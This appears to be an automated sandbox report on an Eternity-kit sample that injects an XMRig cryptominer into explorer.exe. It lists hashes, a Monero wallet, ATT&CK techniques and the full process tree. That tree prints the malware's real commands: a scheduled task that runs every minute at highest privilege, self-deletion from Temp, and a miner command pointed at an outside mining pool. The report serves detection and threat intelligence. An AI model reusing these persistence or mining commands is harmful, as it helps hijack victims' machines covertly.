eternity | 9ea9441f7c4279b04044795c514dab27c1a7129dc744044207cdd4dba0859dc9

Analysis

max time kernel
150s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
07-09-2022 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Size

2.1MB
MD5

d5737f563015ca9df92bf17c6636db42
SHA1

957099807b7ab2e38d583f84fb7059711feec61f
SHA256

a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512

d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518
SSDEEP

49152:kzuzgsK8XCwKyblc81KsH7FtfcaSPL/e6988MKMTq3xJTaUbEyi:NzgEywKybm81KQ7F9caSPi69893Oj81

Score

10^/10

eternity xmrig miner

Malware Config

Extracted

Family

eternity

Wallets

49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW

Signatures

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral7/memory/796-70-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-72-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-74-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-75-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-76-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-78-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-80-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-82-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-81-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-84-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-85-0x00000001402EB66C-mapping.dmp	xmrig
behavioral7/memory/796-87-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-89-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral7/memory/796-90-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
1296	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Deletes itself 1 IoCs

pid	Process
1728	cmd.exe

Loads dropped DLL 1 IoCs

pid	Process
1728	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 892 set thread context of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
944	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1740	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	796	explorer.exe
Token: SeLockMemoryPrivilege	796	explorer.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 1728	1976	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	27
PID 1976 wrote to memory of 1728	1976	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	27
PID 1976 wrote to memory of 1728	1976	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	27
PID 1728 wrote to memory of 1516	1728	cmd.exe	28
PID 1728 wrote to memory of 1516	1728	cmd.exe	28
PID 1728 wrote to memory of 1516	1728	cmd.exe	28
PID 1728 wrote to memory of 1740	1728	cmd.exe	30
PID 1728 wrote to memory of 1740	1728	cmd.exe	30
PID 1728 wrote to memory of 1740	1728	cmd.exe	30
PID 1728 wrote to memory of 944	1728	cmd.exe	31
PID 1728 wrote to memory of 944	1728	cmd.exe	31
PID 1728 wrote to memory of 944	1728	cmd.exe	31
PID 1728 wrote to memory of 892	1728	cmd.exe	32
PID 1728 wrote to memory of 892	1728	cmd.exe	32
PID 1728 wrote to memory of 892	1728	cmd.exe	32
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 892 wrote to memory of 796	892	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	34
PID 1672 wrote to memory of 1296	1672	taskeng.exe	36
PID 1672 wrote to memory of 1296	1672	taskeng.exe	36
PID 1672 wrote to memory of 1296	1672	taskeng.exe	36

C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
  2⤵
  - Deletes itself
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:1516
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1740
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:944
- - C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
    "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:892
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_ZERMMMDR -p x --max-cpu-usage=30 --donate-level=1
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:796

C:\Windows\system32\taskeng.exe
taskeng.exe {2693B212-B803-40D3-B586-7AEEA702C530} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1672
- C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
  C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
  2⤵
  - Executes dropped EXE
  PID:1296

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
memory/796-82-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-75-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-90-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-89-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-88-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/796-87-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-65-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-66-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-68-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-70-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-72-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-74-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-84-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-76-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-78-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-80-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/796-81-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/892-64-0x000000013F930000-0x000000013FB46000-memory.dmp

Filesize
2.1MB

Download
memory/1976-54-0x000000013FE60000-0x0000000140076000-memory.dmp

Filesize
2.1MB

Download
memory/1976-55-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads